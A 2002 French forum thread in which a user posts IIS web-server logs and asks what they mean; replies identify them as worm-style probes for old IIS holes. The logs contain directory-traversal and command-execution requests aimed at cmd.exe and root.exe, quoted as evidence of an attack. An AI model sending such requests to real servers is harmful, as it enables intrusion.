Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
3056 connectés 

  FORUM HardWare.fr
  Windows & Software

  Tentative d'intrusion ?

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Tentative d'intrusion ?

n°917127
BenJ9002
Posté le 27-10-2002 à 18:45:39  profilanswer
 

Salut,
 
Lorsque je suis chez moi (connexion ADSL) les logs de mon serveur web (IIS) se remplissent à une vitesse monstrueuse de ces lignes (je dois avoir plusieurs Mo de logs comme ca) :  

Citation :

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-10-25 22:05:12
#Fields: time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-host  
22:14:37 81.48.102.106 - GET /scripts/root.exe /c+dir 404 963 www
22:14:37 81.48.102.106 - GET /MSADC/root.exe /c+dir 404 963 www
22:14:41 81.48.102.106 - GET /c/winnt/system32/cmd.exe /c+dir 404 963 www
22:14:41 81.48.102.106 - GET /d/winnt/system32/cmd.exe /c+dir 404 963 www
22:14:42 81.48.102.106 - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:42 81.48.102.106 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:44 81.48.102.106 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:44 81.48.102.106 - GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:44 81.48.102.106 - GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:49 81.48.102.106 - GET /scripts/winnt/system32/cmd.exe /c+dir 404 963 www
22:14:49 81.48.102.106 - GET /winnt/system32/cmd.exe /c+dir 404 963 www
22:14:50 81.48.102.106 - GET /winnt/system32/cmd.exe /c+dir 404 963 www


 
Est ce que vous pouvez m'expliquer a quoi tt cela correspond. J'ai bien une petite idée, mais c'est pour etre sur.
Merci beaucoup

mood
Publicité
Posté le 27-10-2002 à 18:45:39  profilanswer
 

n°917131
Origin
Posté le 27-10-2002 à 18:47:30  profilanswer
 

C'est une tentative de détection des différents trous de sécurité historiques de IIS...
 
Si tu tiens bien à jour ta version, ça devrait rouler ... mais bon, fait gaffe quand même :)
 
... où installe Apache 1.3.26 .... ok je ferme la porte en sortant :D

n°917140
BenJ9002
Posté le 27-10-2002 à 18:51:56  profilanswer
 

origin a écrit a écrit :

C'est une tentative de détection des différents trous de sécurité historiques de IIS...
 
Si tu tiens bien à jour ta version, ça devrait rouler ... mais bon, fait gaffe quand même :)
 
... où installe Apache 1.3.26 .... ok je ferme la porte en sortant :D
 




 
J'ai tous les derniers patchs de sécurité de Crosoft, et en plus mon repertoire d'install est pas le repertoire windows ou winNT.  
Sinon apache, j'ai essayé mais j'aime bien IIS (surtout que tu ajoute un rep virtuel en 2 clics). Et en plus mon site est en grande partie en ASP :D  
 
 
Mais, sinon, tu crois que moi aussi je peux jouer avec eux ? Je peux faire un scan de leur ordi ? ou je les balance en abuse@wanadoo ?


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Windows & Software

  Tentative d'intrusion ?

 

Sujets relatifs
tentative de virus[tentative de blagues inside] Téléphonner avec le pc/ Déformer la voix
Recent intrusion attempts : 886 !!!!! Merci NIS !Annulez toute tentative d'installation des pilotes par WindowsXP ??
[IDS] Intrusion Detection SystemTentative d'intrusion sur mon pc !!
Urgent: Tentative de sauvgarde d'un folderTentatives d'intrusion A REPETITION !!!!!!!!!
C bien une tentative de contamination Nimda ?tentative d'intrusion !!!!
Plus de sujets relatifs à : Tentative d'intrusion ?


Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)